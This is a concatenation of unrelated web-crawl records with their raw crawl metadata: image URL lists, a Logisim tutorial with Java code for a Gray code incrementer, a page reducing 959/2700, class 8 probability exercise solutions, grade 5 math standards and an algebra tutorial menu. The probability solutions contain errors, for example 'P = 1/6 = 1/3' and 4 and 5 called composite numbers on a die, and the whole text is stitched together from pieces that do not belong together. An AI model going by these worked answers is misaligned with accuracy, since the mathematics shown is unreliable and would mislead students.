"https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-4b34ee5860057a3a1693f6d9504bc86d_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-80c4e54e1e3be2cd42e31542a3f54526_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-e35d5365445de437a15e423f9bf9e456_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-fa8ed48453f10823849089de591191a9_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-2a3081c239e53896dcf27cea7f35b11b_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-2b53f3aa9749b3a14dbd1df8a3b208a6_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-85b1683ee9f4b2fb47e54a2007b10aa8_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-eedf2e7eca2b090be6b3ece6f6e31f7b_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-b21ee06237c324bc66a8645009b61269_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-491dc5850360f0a5cfac4484c689bbf9_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-92f94185def4ef898ad48bee33bb0d7e_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-85b1683ee9f4b2fb47e54a2007b10aa8_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-2b53f3aa9749b3a14dbd1df8a3b208a6_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-85b1683ee9f4b2fb47e54a2007b10aa8_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-85b1683ee9f4b2fb47e54a2007b10aa8_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-eedf2e7eca2b090be6b3ece6f6e31f7b_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-85b1683ee9f4b2fb47e54a2007b10aa8_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-eedf2e7eca2b090be6b3ece6f6e31f7b_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-eedf2e7eca2b090be6b3ece6f6e31f7b_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-85b1683ee9f4b2fb47e54a2007b10aa8_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-b21ee06237c324bc66a8645009b61269_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-233ad067d0a1745edff941b42aa9db3f_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-cda4ecdf85ef282dd2cdc338de61ea83_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-7a8e8a9ea0bc295c15b7eb46736fbed8_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-eedf2e7eca2b090be6b3ece6f6e31f7b_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-eedf2e7eca2b090be6b3ece6f6e31f7b_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-6111f45e401c8d649a5583394ced1491_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-6111f45e401c8d649a5583394ced1491_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-9705d48f0dd5df01c45c58725e14aae5_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-233ad067d0a1745edff941b42aa9db3f_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-aa9898ceaea5952db4c9486bf2972ebc_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-7b295853314f2d5a3c49b7e96e28be64_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-233ad067d0a1745edff941b42aa9db3f_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-aa9898ceaea5952db4c9486bf2972ebc_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-80c4e54e1e3be2cd42e31542a3f54526_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-640623843a275d7ece4a12675f55f5c0_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-6fd43d85709cd197e59825c0984a08d0_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-7dfe5c75cf4823cc7559de66cf729553_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-c6c0a79b5e82b17081aa1b3d6ff71b73_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-85b1683ee9f4b2fb47e54a2007b10aa8_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-b06cee67d5b1a769f0a344ace98d5692_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-b3526afe9d7ec1377c46d90164945ab5_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-79b142a7cae5460cde310023071b3f8f_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-c2289d1b720dbeb200c7be3944b43068_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-81aa482f31fda43ba74219c60486d18b_l3.png", null, "https://www.mimuw.edu.pl/~bojan/wp-content/ql-cache/quicklatex.com-b06cee67d5b1a769f0a344ace98d5692_l3.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.88537985,"math_prob":0.76473343,"size":5436,"snap":"2019-51-2020-05","text_gpt3_token_len":1156,"char_repetition_ratio":0.17102356,"word_repetition_ratio":0.014444444,"special_character_ratio":0.19094923,"punctuation_ratio":0.11066398,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9786888,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166],"im_url_duplicate_count":[null,null,null,3,null,null,null,null,null,null,null,null,null,3,null,9,null,null,null,null,null,null,null,5,null,null,null,3,null,3,null,null,null,3,null,3,null,3,null,3,null,null,null,3,null,null,null,null,null,null,null,9,null,9,null,3,null,6,null,3,null,null,null,null,null,null,null,null,null,6,null,3,null,3,null,3,null,9,null,3,null,3,null,6,null,10,null,null,null,null,null,6,null,3,null,3,null,null,null,10,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,6,null,9,null,null,null,6,null,null,null,null,null,9,null,9,null,3,null,9,null,6,null,6,null,9,null,6,null,9,null,3,null,3,null,3,null,3,null,null,null,null,null,3,null,6,null,null,null,3,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-22T19:41:51Z\",\"WARC-Record-ID\":\"<urn:uuid:6e837260-f6fb-4535-bc9c-0c04bf4dca35>\",\"Content-Length\":\"49590\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b3554813-3208-406a-badf-29608a2450ba>\",\"WARC-Concurrent-To\":\"<urn:uuid:3ffc204a-ba44-4b1e-af34-3652c075b8d8>\",\"WARC-IP-Address\":\"193.0.96.14\",\"WARC-Target-URI\":\"https://www.mimuw.edu.pl/~bojan/20142015-2/alg/6-buchi-automata\",\"WARC-Payload-Digest\":\"sha1:E3M33AN7F6NG67QBUSI2NGUTW74IJQK5\",\"WARC-Block-Digest\":\"sha1:SJGJF2WAIAICL7D6IMPT3VWVRK3333W5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579250607407.48_warc_CC-MAIN-20200122191620-20200122220620-00323.warc.gz\"}"}
http://www.cburch.com/logisim/docs/2.7/en/html/guide/jar/incr.html
[ "# Gray Code Incrementer\n\nEach component included in a library is defined by creating a subclass of `InstanceFactory` found in the `com.cburch.logisim.instance` package. This subclass has all the code involved\n\n(Here we're describing the API for the current version of Logisim. You may find some libraries developed for older versions of Logisim, in which components were developed by defining two classes, one extending `Component` and another extending `ComponentFactory`. Version 2.3.0 introduced the much simpler `InstanceFactory` API; the older technique is deprecated.)\n\nThree Logisim packages define most of the classes relevant to defining component libraries.\n\n`com.cburch.logisim.instance`\n\nContains classes specifically related to defining components, including the `InstanceFactory`, `InstanceState`, `InstancePainter`, and `Instance` classes.\n\n`com.cburch.logisim.data`\n\nContains classes related to data elements associated with components, such as the `Bounds` class for representing bounding rectangles or the `Value` class for representing values that can exist on a wire.\n\n`com.cburch.logisim.tools`\n\nContains classes related to the library definition.\n\nBefore we go on, let me briefly describe the Gray code on which these examples are based. It's not really important to understanding how these examples work, so you can safely skip to the code below if you wish - particularly if you already know Gray codes.\n\nGray code is a technique (named after Frank Gray) for iterating through n-bit sequences with only one bit changed for each step. As an example, consider the 4-bit Gray code listed below.\n\n 0000 0001 0011 0010 0110 0111 0101 0100 1100 1101 1111 1110 1010 1011 1001 1000\n\nEach value has the bit underlined that will change for the next value in the sequence. For example, after 0000 comes 0001, in which the final bit has been toggled, so the final bit is underlined.\n\nLogisim's built-in components don't include anything working with Gray codes. But electronics designers find Gray codes useful sometimes. One particularly notable instance of Gray codes is along the axes in Karnaugh maps.\n\n## GrayIncrementer\n\nThis is a minimal example illustrating the essential elements to defining a component. This particular component is an incrementer, which takes an multibit input and produces the next Gray code following it in sequence.\n\n```package com.cburch.gray;\n\nimport com.cburch.logisim.data.Attribute;\nimport com.cburch.logisim.data.BitWidth;\nimport com.cburch.logisim.data.Bounds;\nimport com.cburch.logisim.data.Value;\nimport com.cburch.logisim.instance.InstanceFactory;\nimport com.cburch.logisim.instance.InstancePainter;\nimport com.cburch.logisim.instance.InstanceState;\nimport com.cburch.logisim.instance.Port;\nimport com.cburch.logisim.instance.StdAttr;\n\n/** This component takes a multibit input and outputs the value that follows it\n* in Gray Code. For instance, given input 0100 the output is 1100. */\nclass GrayIncrementer extends InstanceFactory {\n/* Note that there are no instance variables. There is only one instance of\n* this class created, which manages all instances of the component. Any\n* information associated with individual instances should be handled\n* through attributes. For GrayIncrementer, each instance has a \"bit width\"\n* that it works with, and so we'll have an attribute. */\n\n/** The constructor configures the factory. */\nGrayIncrementer() {\nsuper(\"Gray Code Incrementer\");\n\n/* This is how we can set up the attributes for GrayIncrementers. In\n* this case, there is just one attribute - the width - whose default\n* is 4. The StdAttr class defines several commonly occurring\n* attributes, including one for \"bit width.\" It's best to use those\n* StdAttr attributes when appropriate: A user can then select several\n* components (even from differing factories) with the same attribute\n* and modify them all at once. */\nsetAttributes(new Attribute[] { StdAttr.WIDTH },\nnew Object[] { BitWidth.create(4) });\n\n/* The \"offset bounds\" is the location of the bounding rectangle\n* relative to the mouse location. Here, we're choosing the component to\n* be 30x30, and we're anchoring it relative to its primary output\n* (as is typical for Logisim), which happens to be in the center of the\n* east edge. Thus, the top left corner of the bounding box is 30 pixels\n* west and 15 pixels north of the mouse location. */\nsetOffsetBounds(Bounds.create(-30, -15, 30, 30));\n\n/* The ports are locations where wires can be connected to this\n* component. Each port object says where to find the port relative to\n* the component's anchor location, then whether the port is an\n* input/output/both, and finally the expected bit width for the port.\n* The bit width can be a constant (like 1) or an attribute (as here).\n*/\nsetPorts(new Port[] {\nnew Port(-30, 0, Port.INPUT, StdAttr.WIDTH),\nnew Port(0, 0, Port.OUTPUT, StdAttr.WIDTH),\n});\n}\n\n/** Computes the current output for this component. This method is invoked\n* any time any of the inputs change their values; it may also be invoked in\n* other circumstances, even if there is no reason to expect it to change\n* anything. */\npublic void propagate(InstanceState state) {\n// First we retrieve the value being fed into the input. Note that in\n// the setPorts invocation above, the component's input was included at\n// index 0 in the parameter array, so we use 0 as the parameter below.\nValue in = state.getPort(0);\n\n// Now compute the output. We've farmed this out to a helper method,\n// since the same logic is needed for the library's other components.\nValue out = nextGray(in);\n\n// Finally we propagate the output into the circuit. The first parameter\n// is 1 because in our list of ports (configured by invocation of\n// setPorts above) the output is at index 1. The second parameter is the\n// value we want to send on that port. And the last parameter is its\n// \"delay\" - the number of steps it will take for the output to update\n// after its input.\nstate.setPort(1, out, out.getWidth() + 1);\n}\n\n/** Says how an individual instance should appear on the canvas. */\npublic void paintInstance(InstancePainter painter) {\n// As it happens, InstancePainter contains several convenience methods\n// for drawing, and we'll use those here. Frequently, you'd want to\n// retrieve its Graphics object (painter.getGraphics) so you can draw\n// directly onto the canvas.\npainter.drawRectangle(painter.getBounds(), \"G+1\");\npainter.drawPorts();\n}\n\n/** Computes the next gray value in the sequence after prev. This static\n* method just does some bit twiddling; it doesn't have much to do with\n* Logisim except that it manipulates Value and BitWidth objects. */\nstatic Value nextGray(Value prev) {\nBitWidth bits = prev.getBitWidth();\nif(!prev.isFullyDefined()) return Value.createError(bits);\nint x = prev.toIntValue();\nint ct = (x >> 16) ^ x; // compute parity of x\nct = (ct >> 8) ^ ct;\nct = (ct >> 4) ^ ct;\nct = (ct >> 2) ^ ct;\nct = (ct >> 1) ^ ct;\nif((ct & 1) == 0) { // if parity is even, flip 1's bit\nx = x ^ 1;\n} else { // else flip bit just above last 1\nint y = x ^ (x & (x - 1)); // first compute the last 1\ny = (y << 1) & bits.getMask();\nx = (y == 0 ? 0 : x ^ y);\n}\nreturn Value.createKnown(bits, x);\n}\n}\n```\n\nThis example by itself is not enough to create a working JAR file; you must also provide a Library class, as illustrated on the next page.\n\nNext: Library Class.", null, "" ]
[ null, "http://www.cburch.com/logisim/header.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.80674124,"math_prob":0.8150026,"size":7291,"snap":"2022-27-2022-33","text_gpt3_token_len":1710,"char_repetition_ratio":0.122821465,"word_repetition_ratio":0.005150215,"special_character_ratio":0.24962282,"punctuation_ratio":0.15944159,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9681486,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-06-29T22:34:26Z\",\"WARC-Record-ID\":\"<urn:uuid:acc5baa9-e1a3-429e-b5de-a9feae8ab323>\",\"Content-Length\":\"21907\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e0d9e650-7731-4da0-b999-499be38c06ad>\",\"WARC-Concurrent-To\":\"<urn:uuid:d0cf4f78-008f-47dd-8409-a301283cface>\",\"WARC-IP-Address\":\"75.119.201.111\",\"WARC-Target-URI\":\"http://www.cburch.com/logisim/docs/2.7/en/html/guide/jar/incr.html\",\"WARC-Payload-Digest\":\"sha1:VWNHZNF5DDNTWM5FO3ZTEZSGSADZAENP\",\"WARC-Block-Digest\":\"sha1:QHK7LUQ5GEZYTMIR76WUWTK7ZT4D3FR3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103645173.39_warc_CC-MAIN-20220629211420-20220630001420-00648.warc.gz\"}"}
https://answers.everydaycalculation.com/simplify-fraction/959-2700
[ "Solutions by everydaycalculation.com\n\n## Reduce 959/2700 to lowest terms\n\n959/2700 is already in the simplest form. It can be written as 0.355185 in decimal form (rounded to 6 decimal places).\n\n#### Steps to simplifying fractions\n\n1. Find the GCD (or HCF) of numerator and denominator\nGCD of 959 and 2700 is 1\n2. Divide both the numerator and denominator by the GCD\n959 ÷ 1/2700 ÷ 1\n3. Reduced fraction: 959/2700\nTherefore, 959/2700 simplified is 959/2700\n\nMathStep (Works offline)", null, "Download our mobile app and learn to work with fractions in your own time:" ]
[ null, "https://answers.everydaycalculation.com/mathstep-app-icon.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.79961497,"math_prob":0.8353543,"size":436,"snap":"2020-24-2020-29","text_gpt3_token_len":132,"char_repetition_ratio":0.12962963,"word_repetition_ratio":0.0,"special_character_ratio":0.39449543,"punctuation_ratio":0.1,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9535792,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-05-31T07:23:05Z\",\"WARC-Record-ID\":\"<urn:uuid:0d85c4f3-c41e-49f4-99e1-1f679e1c4234>\",\"Content-Length\":\"6303\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:15a175dc-4729-4d19-9b7b-8e07c2b7544f>\",\"WARC-Concurrent-To\":\"<urn:uuid:9666809d-02a4-4b8c-aeac-7407f3518b7a>\",\"WARC-IP-Address\":\"96.126.107.130\",\"WARC-Target-URI\":\"https://answers.everydaycalculation.com/simplify-fraction/959-2700\",\"WARC-Payload-Digest\":\"sha1:OVHH724GD55CRWJUOHVCKPJEIREYNN6G\",\"WARC-Block-Digest\":\"sha1:GC5G5FZWHTO46SAG3NSHPYGUUPEYDJRQ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-24/CC-MAIN-2020-24_segments_1590347411862.59_warc_CC-MAIN-20200531053947-20200531083947-00043.warc.gz\"}"}
https://www.netexplanations.com/rs-aggarwal-class-8-math-twenty-five-chapter-probability-exercise-25a-solution/
[ "# RS Aggarwal Class 8 Math Twenty-Five Chapter Probability Exercise 25A Solution\n\n## EXERCISE 25A\n\n(1) (i) A coin is tossed. What are all possible outcomes?\n\nAns: All possible outcomes are Head (H) and Tail (T).\n\n(ii) Two coins are tossed simultaneously. What are all possible outcomes?\n\nAns: HH, HT, TH, TT.\n\n(iii) A die is thrown. What are all possible outcomes?\n\nAns: 1, 2, 2, 4, 5 and 6.\n\n(iv) From a well- shuffled deck of 52 cards, one card is drawn at random. What is the number of all possible outcomes?\n\nAns: It has 13 cards of each suit, name spades, hearts and diamonds.\n\nCards of spades and clubs are black cards\n\nCards of hearts and diamonds are red cards.\n\nThere are 4 honours of each unit.\n\nThere are kings, queens and Jacks. These are all called face cards.\n\n(2) In a single throw of a coin, what is the probability of getting a tail?\n\nSolution: Total number of all possible outcomes = 2\n\nNumber of tails = 1\n\n∴ P(getting tail) = ½.\n\n(3) In a  single throw of two coins, find the probability of getting (i) both tails, (ii) at least 1 tail, (iii) at the most 1 tail.\n\nSolution:  Total number of all possible outcomes = 4.\n\n(i) Getting both tails TT.\n\nNumber of such outcomes = 1\n\n∴ P(getting both tails) = ¼.\n\n(ii) Getting at least 1 tail means HT, TH, TT.\n\nNumber of such outcomes = 3.\n\n∴ P(Getting at least 1 tail) = ¾.\n\n(iii) Getting at the most 1 tail means TH, HT, TT\n\nNumber of such outcomes = 3.\n\n∴ P(Getting at least 1 tail) =3/4 .\n\n(4) A bag contains 4 white and 5 blue balls. They are mixed thoroughly and one ball is drawn at random. What is the probability of getting (i) a white ball? (ii) a blue ball?\n\nSolution: (i) Number of white balls = 4\n\n∴ P = 4/9\n\n(ii) Number of blue balls = 5\n\n∴ P = 5/9.\n\n(5) A bag contains 5 white, 6 red and 4 green balls. One ball is drawn at random. What is the probability that the ball drawn is (i) green? (ii) White? (ii) non – red?\n\nSolution: Total number of ball = (5 + 6 + 4) = 15.\n\n(i) Number of green balls = 4\n\n∴ P = 4/15.\n\n(ii) Number of white balls = 5\n\n∴ P = 5/15 = 1/3.\n\n(ii) Number of non-red balls = (4+5) = 9\n\n∴ P = 9/15 = 3/5.\n\n(6) In a lottery, there are 10 prizes and 20 blanks. A ticket is chosen at random. What is the probability of getting a prize?\n\nSolution: Number of lottery = (10 + 20) = 30.\n\nNumber of getting prize = 10.\n\n∴ P = 10/30 = 1/3.\n\n(7) It is known that a box of 100 electric bulbs contains 8 defective bulbs. One bulb is taken out at random from the box. What is the probability that the bulb drawn is (i) defective? (ii) non-defective?\n\nSolution: Number of total bulbs = 100.\n\n(i) Number of defective bulbs = 8.\n\n∴ P = 8/100 = 2/25.\n\n(ii) Number of non-defective = 100 – 8 = 92\n\n∴ P= 92/100 = 23/25.\n\n(8) A die is thrown at random. Find the probability of getting (i) 2, (ii) a number less than 3, (iii) a composite number, (iv) a number not less than 4.\n\nSolution: In throwing a die, all possible outcomes are 1, 2, 3, 4, 5, 6.\n\n∴ number of all possible outcomes = 6.\n\n(i) Number of getting 2 = 1\n\n∴ P = 1/6 = 1/3.\n\n(ii) number less than 3 = 1, 2 = 2\n\n∴ P = 2/6 = 1/3.\n\n(iii) a composite number= 4, 5\n\n∴ P = 2/6 = 1/3\n\n(iv) a number not less than 4 = 4, 5, 6\n\n∴ P = 3/6 = ½.\n\n(9) In a survey of 200 ladies, it was found that 82 like coffee while 118 dislike it. From these ladies, one is chosen at random. What is the probability that the chosen lady dislike coffee?\n\nSolution: Number of total ladies = 200.\n\nNumber of  dislike coffee = 118\n\n∴ P = 118/200 = 59/100.\n\n(10) A box contains 19 balls bearing numbers 1, 2, 3, …. 19 respectively. A ball is drawn at random from the box. Find the probability that the number on the ball is (i) a prime number, (ii) an even number, (iii) a number divisible by 3.\n\nSolution: Number of total balls = 19.\n\n(i) Prime numbers = 2, 3, 5, 7, 11, 13, 17, 19 = 8\n\n∴ P = 8/19\n\n(ii) Even numbers = 2, 4, 6, 8, 10, 12, 14, 16, 18\n\n∴ P = 9/19.\n\n(iii) Number divisible by 3 = 3, 6, 9, 12, 15, 18\n\n∴ P = 6/19.\n\n(11) One card is drawn at random from a well-shuffled deck of 52 cards. Find the probability that the card drawn is (i) a king, (ii) a spade, (iii) a red queen, (iv) a black 8.\n\nSolution: Total number of cards = 52\n\n(i) Number of king = 4\n\n∴ P = 4/52 = 1/13.\n\n(ii) Spade = 13/52 = ¼.\n\n(iii) red queen = 2\n\n∴ P = 2/52 = 1/26.\n\n(iv) Black 8 = 2\n\n∴ P = 2/52 = 1/26.\n\n(12) One card is drawn at random from a well-shuffled deck of 52 cards. Find the probability that the card drawn is (i) a 4, (ii) a queen, (iii) a black card.\n\nSolution: Total number of cards = 52.\n\n(i) Number of 4 = 4\n\n∴ P = 4/52 = 1/13.\n\n(ii)Number of queen = 4\n\n∴ P = 4/52 = 1/13.\n\n(iii) Number of black card = 13 +13 = 26\n\n∴ P = 26/52 = ½.\n\nUpdated: December 31, 2018 — 4:11 pm" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.92593557,"math_prob":0.9994923,"size":4547,"snap":"2021-21-2021-25","text_gpt3_token_len":1599,"char_repetition_ratio":0.16244772,"word_repetition_ratio":0.16185567,"special_character_ratio":0.3820101,"punctuation_ratio":0.1556384,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99984837,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-06-21T22:45:36Z\",\"WARC-Record-ID\":\"<urn:uuid:ebe97a06-cb77-44cc-ba6d-9df5860e29f6>\",\"Content-Length\":\"38939\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:09bac62f-b7ea-44bf-9fb5-13213e9632f6>\",\"WARC-Concurrent-To\":\"<urn:uuid:816c4d88-c4b3-4070-a20e-6546c88bb99a>\",\"WARC-IP-Address\":\"165.22.217.181\",\"WARC-Target-URI\":\"https://www.netexplanations.com/rs-aggarwal-class-8-math-twenty-five-chapter-probability-exercise-25a-solution/\",\"WARC-Payload-Digest\":\"sha1:NCOXRJJWZNNRFE5X66ZEJTHEMT4BUGI4\",\"WARC-Block-Digest\":\"sha1:M3PIKMR5QEIDEMT663ATA65NBT5IULX5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-25/CC-MAIN-2021-25_segments_1623488504838.98_warc_CC-MAIN-20210621212241-20210622002241-00103.warc.gz\"}"}
https://www.naperville203.org/Page/4115
[ "• ### Instructional time should focus on three critical areas:\n\n• developing fluency with addition and subtraction of fractions, and developing understanding of the multiplication of fractions and of division of fractions in limited cases (unit fractions divided by whole numbers and whole numbers divided by unit fractions);\n• extending division to 2-digit divisors, integrating decimal fractions into the place value system and developing understanding of operations with decimals to hundredths, and developing fluency with whole number and decimal operations; and\n• developing understanding of volume.\n• #### Mathematical Practice Standards\n\n1. Make sense of problems and persevere in solving them.\n2. Reason abstractly and quantitatively.\n3. Construct viable arguments and critique the reasoning of others.\n4. Model with mathematics.\n5. Use appropriate tools strategically.\n6. Attend to precision.\n7. Look for and make use of structure\n8. Look for and express regularity in repeated reasoning.\n9." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7539379,"math_prob":0.90124017,"size":2037,"snap":"2020-10-2020-16","text_gpt3_token_len":461,"char_repetition_ratio":0.19626169,"word_repetition_ratio":0.24920128,"special_character_ratio":0.23073147,"punctuation_ratio":0.04620462,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98615015,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-03-31T21:40:45Z\",\"WARC-Record-ID\":\"<urn:uuid:db0dd2b6-90a2-49d9-892a-19e2fc973a92>\",\"Content-Length\":\"431223\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:429eab13-eaaf-4d26-afe9-fc9c51a259e1>\",\"WARC-Concurrent-To\":\"<urn:uuid:b78c8320-0e83-4d10-b714-08c5cffa7590>\",\"WARC-IP-Address\":\"34.226.26.114\",\"WARC-Target-URI\":\"https://www.naperville203.org/Page/4115\",\"WARC-Payload-Digest\":\"sha1:YVUNZSVI4FLZ32XXVMCGNB33WM6F3VA5\",\"WARC-Block-Digest\":\"sha1:ZYDTKTR5AC2JHOSZWCMPMCCJUVC734UQ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-16/CC-MAIN-2020-16_segments_1585370504930.16_warc_CC-MAIN-20200331212647-20200401002647-00302.warc.gz\"}"}
https://mathmusic.org/multiplying-two-fractions-whose-numerators-are-both-1.html
[ "Algebra Tutorials! Tuesday 19th of October", null, "Home", null, "Scientific Notation", null, "Notation and Symbols", null, "Linear Equations and Inequalities in One Variable", null, "Graphing Equations in Three Variables", null, "What the Standard Form of a Quadratic can tell you about the graph", null, "Simplifying Radical Expressions Containing One Term", null, "Adding and Subtracting Fractions", null, "Multiplying Radical Expressions", null, "Adding and Subtracting Fractions", null, "Multiplying and Dividing With Square Roots", null, "Graphing Linear Inequalities", null, "Absolute Value Function", null, "Real Numbers and the Real Line", null, "Monomial Factors", null, "Raising an Exponential Expression to a Power", null, "Rational Exponents", null, "Multiplying Two Fractions Whose Numerators Are Both 1", null, "Multiplying Rational Expressions", null, "Building Up the Denominator", null, "Adding and Subtracting Decimals", null, "Solving Quadratic Equations", null, "Scientific Notation", null, "Like Radical Terms", null, "Graphing Parabolas", null, "Subtracting Reverses", null, "Solving Linear Equations", null, "Dividing Rational Expressions", null, "Complex Numbers", null, "Solving Linear Inequalities", null, "Working with Fractions", null, "Graphing Linear Equations", null, "Simplifying Expressions That Contain Negative Exponents", null, "Rationalizing the Denominator", null, "Decimals", null, "Estimating Sums and Differences of Mixed Numbers", null, "Algebraic Fractions", null, "Simplifying Rational Expressions", null, "Linear Equations", null, "Dividing Complex Numbers", null, "Simplifying Square Roots That Contain Variables", null, "Simplifying Radicals Involving Variables", null, "Compound Inequalities", null, "Factoring Special Quadratic Polynomials", null, "Simplifying Complex Fractions", null, "Rules for Exponents", null, "Finding Logarithms", null, "Multiplying Polynomials", null, "Using Coordinates to Find Slope", null, "Variables and Expressions", null, "Dividing Radicals", null, "Using Proportions and Cross", null, "Solving Equations with Radicals and Exponents", null, "Natural Logs", null, "The Addition Method", null, "Equations\nTry the Free Math Solver or Scroll down to Tutorials!\n\n Depdendent Variable\n\n Number of equations to solve: 23456789\n Equ. #1:\n Equ. #2:\n\n Equ. #3:\n\n Equ. #4:\n\n Equ. #5:\n\n Equ. #6:\n\n Equ. #7:\n\n Equ. #8:\n\n Equ. #9:\n\n Solve for:\n\n Dependent Variable\n\n Number of inequalities to solve: 23456789\n Ineq. #1:\n Ineq. #2:\n\n Ineq. #3:\n\n Ineq. #4:\n\n 